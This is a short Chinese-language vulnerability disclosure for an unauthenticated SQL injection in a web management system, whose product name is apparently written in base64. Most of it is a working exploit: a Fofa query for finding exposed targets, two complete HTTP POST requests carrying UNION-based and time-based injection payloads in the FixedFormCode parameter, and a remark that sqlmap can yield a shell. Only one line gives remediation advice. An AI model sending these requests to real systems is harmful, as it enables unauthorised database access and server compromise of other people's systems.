0x01 漏洞描述:
5ZCM6ZGrVDllSFLkv6Hmga/ljJbnrqHnkIbns7vnu58= GetFlowDropDownListItems 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
0x02 影响版本:
5ZCM6ZGrVDllSFINCg==
5ZCM6ZGrVDExZUhS
0x03 搜索语句:
Fofa:body="T9eHR"
0x04 漏洞复现:
poc1:
POST /Common/GetFlowDropDownListItems HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
FixedFormCode=1%27%20UNION%20ALL%20SELECT%20NULL%2C@@VERSION--
poc2:
POST /Common/GetFlowDropDownListItems HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
FixedFormCode=1' WAITFOR DELAY '0:0:5'-- DaFs
利用sqlmap进行shell
0x05 修复建议:
关闭互联网暴露面或接口设置访问权限